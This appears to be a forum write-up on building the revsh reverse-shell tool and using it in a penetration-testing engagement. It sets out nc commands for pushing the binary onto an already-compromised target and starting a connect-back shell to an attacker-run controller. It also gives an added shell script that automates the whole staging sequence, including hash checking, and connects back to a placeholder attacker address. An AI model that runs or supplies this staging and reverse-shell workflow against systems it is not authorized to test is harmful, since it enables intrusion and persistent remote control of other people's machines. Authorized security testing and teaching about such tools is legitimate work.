Took a couple of hours to figure out this tool and wrote a little write-up on the issues I found, how I solved them, and an example engagement. Props to @emptymonkey on Twitter for the tool! https://github.com/emptymonkey/revsh.git
sudo apt-get install build-essential openssl libssl-dev # Pre-reqs for building (build-essential supplies gcc and make).
git clone https://github.com/emptymonkey/revsh.git
cd revsh
nano config.h # (OPTIONAL) Set up new defaults that fit your situation.
Editing the Makefile
nano Makefile #EDIT THE MAKEFILE SO IT LOOKS LIKE THIS
CFLAGS = -Wall -Wextra -std=c99 -pedantic -Os -DOPENSSL
LIBS = -lssl -lcrypto
KEYS_DIR = keys
KEY_OF_C = in_the_key_of_c
IO_DEP = io_ssl.c
## Linux w/static libraries.
#CFLAGS = -static -Wall -Wextra -std=c99 -pedantic -Os -DOPENSSL
#LIBS = -lssl -lcrypto -ldl -lz
#KEYS_DIR = keys
#KEY_OF_C = in_the_key_of_c
#IO_DEP = io_ssl.c
sudo mkdir -p /usr/local/share/man/man1 2>/dev/null # Weird problem I ran into (note: "2>/dev/null", not "2&>", which would create a directory literally named "2")
make # This *can* take a very long time, though it usually doesn’t.
nano rc # (OPTIONAL) Add your favorite startup commands to really customize the feel of your remote shell.
revsh -h # READY TO GO
Now to attack!
Once you get a shell on the target, push the revsh binary over with nc. First set up the receiving side on the target (traditional nc syntax; OpenBSD nc takes "-l <port>" with no "-p"):
nc -l -p <port> > revsh
Then send the file from your box:
nc -w 3 <ip> <port> < revsh
Once uploaded, make it executable before you try to run it:
chmod +x revsh
Start the command-and-control side on your own box first so it is listening when the target calls back ("-c" is control mode; see revsh -h):
revsh -c -vvv <ip>:<port>
Then on the target, connect back to that listener (no "-c", since the default is target mode):
./revsh -vvv <ip>:<port>
If you get a fingerprint mismatch, the two binaries were not built from the same tree: the controller's key material is baked in at build time, so a target built elsewhere cannot verify the controller. You can get past it with the '-a' flag, which switches to anonymous Diffie-Hellman, but that drops the authentication entirely, so anyone who can intercept the connection can sit in the middle of it. Rebuilding both sides from the same tree is the better fix.
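The upload, verify, chmod, connect-back sequence above, scripted as an added example. This is not code from the original post or from the revsh project; it wraps the same nc and revsh commands in shell functions and adds a hash check so a truncated or corrupted transfer is never executed. The attacker address (10.0.0.5), transfer port (4444) and listener port (443) are hypothetical placeholders.

```shell
# Added example: stage revsh on a target over nc and verify it before running it.
# Hypothetical values; override them in the environment for a real engagement.
ATTACKER="${ATTACKER:-10.0.0.5}"   # box running "revsh -c"
XFER_PORT="${XFER_PORT:-4444}"     # nc port used for the file transfer
C2_PORT="${C2_PORT:-443}"          # port the revsh controller listens on

# sha256 of a file, portable across GNU sha256sum and BSD/macOS shasum.
file_sha256() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | awk '{print $1}'
    else
        shasum -a 256 "$1" | awk '{print $1}'
    fi
}

# Return 0 only if the received file is non-empty and hashes to the expected value.
# A dropped nc connection leaves a short file that "chmod +x" would happily run.
verify_transfer() {
    expected="$1"
    received="$2"
    [ -s "$received" ] || return 1
    [ "$(file_sha256 "$received")" = "$expected" ]
}

# Attacker side: print the hash to paste into the target shell, then push the file.
# "-w 3" makes nc give up 3 seconds after stdin is drained and nothing more arrives.
push_binary() {
    target="$1"
    echo "expected sha256: $(file_sha256 ./revsh)"
    nc -w 3 "$target" "$XFER_PORT" < ./revsh
}

# Target side: receive on the transfer port, verify, chmod, then connect back.
# Traditional nc wants "-l -p PORT"; OpenBSD nc wants "-l PORT".
stage_and_run() {
    expected="$1"
    nc -l -p "$XFER_PORT" > ./revsh
    if ! verify_transfer "$expected" ./revsh; then
        echo "transfer failed or binary corrupted, not executing" >&2
        return 1
    fi
    chmod +x ./revsh
    # No "-c" here: default mode is target mode, which connects back to the
    # controller started on the attacker box with: revsh -c -vvv "$ATTACKER:$C2_PORT"
    ./revsh -vvv "$ATTACKER:$C2_PORT"
}
```

Usage: on your box run `push_binary <target-ip>` and copy the printed hash; on the target run `stage_and_run <that-hash>` (start the nc listener side first, as the function does, before pushing). The hash check costs nothing and catches the common case of nc cutting off mid-transfer, which otherwise shows up as a confusing "cannot execute binary file" on the target.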